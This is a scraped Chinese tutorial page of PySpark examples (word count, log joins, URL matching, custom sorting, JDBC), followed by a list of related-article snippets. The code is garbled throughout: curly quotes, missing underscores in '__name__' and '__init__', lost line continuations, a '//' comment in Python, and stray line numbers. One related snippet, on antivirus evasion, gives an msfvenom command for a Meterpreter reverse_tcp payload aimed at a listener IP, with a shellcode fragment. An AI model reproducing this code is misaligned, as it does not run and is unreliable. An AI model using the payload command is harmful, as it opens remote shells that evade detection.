pythonspark实例_spark+python快速入门实战小例子(PySpark)

1、集群测试实例

代码如下:

from pyspark.sql import SparkSession

if __name__ == "__main__":

spark = SparkSession\

.builder\

.appName("PythonWordCount")\

.master("spark://mini1:7077") \

.getOrCreate()

spark.conf.set("spark.executor.memory", "500M")

sc = spark.sparkContext

a = sc.parallelize([1, 2, 3])

b = a.flatMap(lambda x: (x,x ** 2))

print(a.collect())

print(b.collect())1

2

3

4

5

6

7

8

9

10

11

12

运行结果:

ee0b496107984f73974999ce6a8fc58a.jpg

2、从文件中读取

为了方便调试,这里采用本地模式进行测试

from py4j.compat import long

from pyspark.sql import SparkSession

def formatData(arr):

# arr = arr.split(",")

mb = (arr[0], arr[2])

flag = arr[3]

time = long(arr[1])

# time = arr[1]

if flag == "1":

time = -time

return (mb,time)

if name == “main”:

spark = SparkSession

.builder

.appName(“PythonWordCount”)

.master(“local”)

.getOrCreate()

sc = spark.sparkContext

# sc = spark.sparkContext

line = sc.textFile("D:\\code\\hadoop\\data\\spark\\day1\\bs_log").map(lambda x: x.split(','))

count = line.map(lambda x: formatData(x))

rdd0 = count.reduceByKey(lambda agg, obj: agg + obj)

# print(count.collect())

line2 = sc.textFile("D:\\code\\hadoop\\data\\spark\\day1\\lac_info.txt").map(lambda x: x.split(','))

rdd = count.map(lambda arr: (arr[0][1], (arr[0][0], arr[1])))

rdd1 = line2.map(lambda arr: (arr[0], (arr[1], arr[2])))

rdd3 = rdd.join(rdd1)

rdd4 =rdd0.map(lambda arr: (arr[0][0], arr[0][1], arr[1]))

# .map(lambda arr: list(arr).sortBy(lambda arr1: arr1[2]).reverse)

rdd5 = rdd4.groupBy(lambda arr: arr[0]).values().map(lambda das: sorted(list(das), key=lambda x: x[2], reverse=True))

print(rdd5.collect())

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

原文件数据:

d536c0a26eb742c993a8bc893eb3ed61.jpg

8e74c8eefe284dad9d984dcd24236d82.png

结果如下:

[[('18688888888', '16030401EAFB68F1E3CDF819735E1C66', 87600), ('18688888888', '9F36407EAD0629FC166F14DDE7970F68', 51200), ('18688888888', 'CC0710CC94ECC657A8561DE549D940E0', 1300)], [('18611132889', '16030401EAFB68F1E3CDF819735E1C66', 97500), ('18611132889', '9F36407EAD0629FC166F14DDE7970F68', 54000), ('18611132889', 'CC0710CC94ECC657A8561DE549D940E0', 1900)]]1

3、读取文件并将结果保存至文件

from pyspark.sql import SparkSession

from py4j.compat import long

def formatData(arr):

# arr = arr.split(",")

mb = (arr[0], arr[2])

flag = arr[3]

time = long(arr[1])

# time = arr[1]

if flag == “1”:

time = -time

return (mb,time)

if name == “main”:

spark = SparkSession

.builder

.appName(“PythonWordCount”)

.master(“local”)

.getOrCreate()

sc = spark.sparkContext

line = sc.textFile(“D:\code\hadoop\data\spark\day1\bs_log”).map(lambda x: x.split(’,’))

rdd0 = line.map(lambda x: formatData(x))

rdd1 = rdd0.reduceByKey(lambda agg, obj: agg + obj).map(lambda t: (t[0][1], (t[0][0], t[1])))

line2 = sc.textFile(“D:\code\hadoop\data\spark\day1\lac_info.txt”).map(lambda x: x.split(’,’))

rdd2 = line2.map(lambda x: (x[0], (x[1], x[2])))

rdd3 = rdd1.join(rdd2).map(lambda x: (x[1][0][0], x[0], x[1][0][1], x[1][1][0], x[1][1][1]))

rdd4 = rdd3.groupBy(lambda x: x[0])

rdd5 = rdd4.mapValues(lambda das: sorted(list(das), key=lambda x: x[2], reverse=True)[:2])

print(rdd1.join(rdd2).collect())

print(rdd5.collect())

rdd5.saveAsTextFile("D:\\code\\hadoop\\data\\spark\\day02\\out1")

sc.stop()

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

结果如下:

e0a99bfaf4d041498d5e7ed918df3b12.jpg

4、根据自定义规则匹配

import urllib

from pyspark.sql import SparkSession

def getUrls(urls):

url = urls[0]

parsed = urllib.parse.urlparse(url)

return (parsed.netloc, url, urls[1])

if name == “main”:

spark = SparkSession

.builder

.appName(“PythonWordCount”)

.master(“local”)

.getOrCreate()

sc = spark.sparkContext

line = sc.textFile(“D:\code\hadoop\data\spark\day02\itcast.log”).map(lambda x: x.split(’\t’))

//从数据库中加载规则

arr = [“java.itcast.cn”, “php.itcast.cn”, “net.itcast.cn”]

rdd1 = line.map(lambda x: (x[1], 1))

rdd2 = rdd1.reduceByKey(lambda agg, obj: agg + obj)

rdd3 = rdd2.map(lambda x: getUrls(x))

for ins in arr:

rdd = rdd3.filter(lambda x:x[0] == ins)

result = rdd.sortBy(lambda x: x[2], ascending = False).take(2)

print(result)

spark.stop()

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

结果如下:

f8a8f2ce843b444fb20ae0688e29f8a7.jpg

5、自定义类排序

from operator import gt

from pyspark.sql import SparkSession

class Girl:

def init(self, faceValue, age):

self.faceValue = faceValue

self.age = age

def __gt__(self, other):

if other.faceValue == self.faceValue:

return gt(self.age, other.age)

else:

return gt(self.faceValue, other.faceValue)

if name == “main”:

spark = SparkSession

.builder

.appName(“PythonWordCount”)

.master(“local”)

.getOrCreate()

sc = spark.sparkContext

rdd1 = sc.parallelize([(“yuihatano”, 90, 28, 1), (“angelababy”, 90, 27, 2), (“JuJingYi”, 95, 22, 3)])

rdd2 = rdd1.sortBy(lambda das: Girl(das[1], das[2]),False)

print(rdd2.collect())

sc.stop()

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

结果如下:

611b9c7239d548a88a742c141dde9300.jpg

6、JDBC

from pyspark import SQLContext

from pyspark.sql import SparkSession

if name == “main”:

spark = SparkSession

.builder

.appName(“PythonWordCount”)

.master(“local”)

.getOrCreate()

sc = spark.sparkContext

sqlContext = SQLContext(sc)

df = sqlContext.read.format(“jdbc”).options(url=“jdbc:mysql://localhost:3306/hellospark”,driver=“com.mysql.jdbc.Driver”,dbtable="(select * from actor) tmp",user=“root”,password=“123456”).load()

print(df.select(‘description’,‘age’).show(2))

# print(df.printSchema)

sc.stop()

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

结果如下:

86b60f0f4c8342b891c28c42633f03e5.jpg

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/271263.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

SQL数据库。按年,月,日查询

select * from pop where year(pdate)年份 and month(pdate)>1 and month(pdate)<3select * from Mall_Coupons where year(StartDate)2011 and month(StartDate)>12 and month(StartDate)<2转载于:https://www.cnblogs.com/wybshyy/p/5847894.html

【Spark】Spark基础教程知识点

第 1 部分 Spark 基础 Spark 概述 本章介绍 Spark 的一些基本认识. Spark官方地址 一&#xff1a;什么是 Spark Spark 是一个快速(基于内存), 通用, 可扩展的集群计算引擎 并且 Spark 目前已经成为 Apache 最活跃的开源项目, 有超过 1000 个活跃的贡献者. 历史 2009 年…

关系数据库理论:数据库的六大范式知识笔记

1、数据库范式的作用数据库范式主要是为解决关系数据库中数据冗余、更新异常、插入异常、删除异常问题而引入的设计理念。简单来说&#xff0c;数据库范式可以避免数据冗余&#xff0c;减少数据库的存储空间&#xff0c;并且减轻维护数据完整性的成本。是关系数据库核心的技术之…

python 生成payload_利用Python进行Payload分离免杀

缺点&#xff1a;编译成exe以后体积过大实现&#xff1a;msf生成shellcode代码&#xff1a;msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST192.168.3.60 LPORT3333 -f c将payload给copy下来&#xff0c;去除引号。\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\…

ping不通docker_初识docker

前言大家好&#xff0c;我是jack xu&#xff0c;本篇是我在今日头条的首秀&#xff0c;我的英文名来源于jack ma&#xff0c;马云&#xff0c;所以大家也可以叫我徐云&#xff0c;即我希望像马云一样富有、成功&#xff0c;另外我名字中的杰与jack也是谐音关系。今天给大家带来…

H5基础标签

一、字体标签 1.text-indent&#xff1a;首行缩进 2.text-decoration&#xff1a;文本修饰&#xff08;text-decoration&#xff1a;none;除去文字的下划线&#xff1b;text-decoration&#xff1a;line-through&#xff1b;文字上加删除线&#xff09; 3.letter-spacing&#…

SQL语言基础:数据库语言概念介绍

1、概念介绍SQL&#xff08;Structured Query Lanauage&#xff09;结构化查询语言是关系数据库中最普遍使用的语言。主要包括查询、数据操纵、数据定义、数据控制功能&#xff0c;是一种通用的、功能强大的关系数据库的标准语言。2、SQL语言分类2.1 数据库定义语言&#xff08…

configuration 命名空间_kubernetes30:monitoring命名空间处于Terminating状态的处理方法...

删除monitoring命名空间时总也无法彻底删除&#xff0c;发现monitoring处于Terminating状态&#xff0c;故有此文。kubectl get namespaces -o wide解决&#xff1a;尝试使用force delete。kubectl delete namespace monitoring --force --grace-period0发现强制删除没有成功。…

SQL语言基础:SQL语言概念知识笔记

1、SQL标准ANSI&#xff08;美国国家标准机构&#xff09;SQL对ANSI SQL进行修改后在1992年采用的标准SQL-92或SQL2SQL-99或SQL3标准从SQL2扩充而来&#xff0c;增加了对象关系特征和许多其他新的功能。最近的标准版本是SQL&#xff1a;20032、SQL的特点综合统一&#xff1a;SQ…

重定向与转发

使用重定向方法sendRedirect()将用户重新定向到一个JSP页面或另一个Servlet。 RequestDispatcher对象调用void forward(ServletRequest request,ServletResponse response) 方法可以将用户对当前JSP页面或Servlet的请求转发给RequestDispatcher对象所指定的JSP页面或Servlet。 …

ubuntu mysql 内存满了_Ubuntu mysql可以把data防止到内存盘中

作者&#xff1a;李祥敬2010-03-04/17:57Ubuntu mysql对于电脑使用的玩家的常用软件&#xff0c;然后我就学习及深入的研究Ubuntu mysql&#xff0c;在这里和大家一起探讨Ubuntu mysql的使用方法&#xff0c;希望对大家有用。1、如果Ubuntu mysql的data数据很少&#xff0c;内存…

原型(Prototype)的场景是不支持循环依赖的

原型(Prototype)的场景是不支持循环依赖的&#xff0c;通常会走到AbstractBeanFactory类中下面的判断&#xff0c;抛出异常。

网络工程中,VLAN到底有什么作用?

什么是VLAN呢&#xff1f;VLAN&#xff08;Virtual Local Area Network&#xff09;即虚拟局域网&#xff0c;是将一个物理的LAN在逻辑上划分成多个广播域的通信技术。在IEEE802.1Internetworking委员会结束了对VLAN初期标准的修订工作的时候。新出台的标准进一步完善了VLAN的体…

java的decode_Java decode机试题

/**** java编写encode方法和decode方法&#xff0c;机试题 请你用java&#xff0c;c&#xff0c;c* 中任何一种语言实现两个函数encode()和decode()&#xff0c;分别实现对字符串的变换和复原。* 变换函数encode()顺序考察以知字符串的字符&#xff0c;按以下规则逐组生成新字符…

hrjava项目原型html_Mockplus for Mac(原型设计工具)

Mockplus for Mac是Mac平台上一款简单、快速的原型设计工具&#xff0c;无需任何编程&#xff0c;不需要任何编程基础知识&#xff0c;帮你快速使用Mockplus设计图形。Mockplus封装了近200个组件&#xff0c;提供3000个以上的图标素材。做图时&#xff0c;只需要把这些组件放入…

Leetcode 给定一个数组,给定一个数字。返回数组中可以相加得到指定数字的两个索引

问题内容是&#xff1a;给定一个数组&#xff0c;给定一个数字。返回数组中可以相加得到指定数字的两个索引。 比如&#xff1a;给定nums [2, 7, 11, 15], target 9 那么要返回 [0, 1]&#xff0c;因为2 7 9 这道题的优解是&#xff0c;一次遍历HashMap&#xff1a; 先去…

java 正则表达式 提取ip_java正则表达式提取地址中的ip和端口号

由于我需要用到java正则表达式提取地址中的ip和端口号&#xff0c;所以我就写了一个demo&#xff0c;测试一下&#xff0c;下面是demopublic class Test0810_1 {public static void main(String[] args) {//通过控制板输入想要输入的地址&#xff0c;然后测试是否符合规则Scann…

SQL语言基础:常用的数据查询语句

1、创建表语法格式&#xff1a;creat table <表名> (<,列名><数据类型>[列级完整性约束条件]<,列名><数据类型>[列级完整性约束条件]...[,<表级完整性约束条件>]);列级完整性约束条件&#xff1a;主键、外键 、唯一 unique、检查 、默认值…

两个不同网段的局域网如何互通_不同网段之间如何通信?

计算机之前是如何实现互相通信的呢&#xff1f;正文首先&#xff0c;计算机之间通信人为设定一个准则&#xff0c;这个准则是什么呢&#xff1f;如果两台计算机在一个相同网段&#xff0c;不需要辅助设备(网关)的帮助&#xff0c;可以直接通信。如果两台计算机在不同网段&#…

Java是值传递还是引用传递?

Java是值传递&#xff1a; &#xff08;1&#xff09;基本类型作为参数传递时&#xff0c;是传递值的拷贝&#xff0c;无论你怎么改变这个拷贝&#xff0c;原值是不会改变的&#xff1b; &#xff08;2&#xff09;对象的引用作为参数传递时&#xff0c;是把对象在内存中的地址…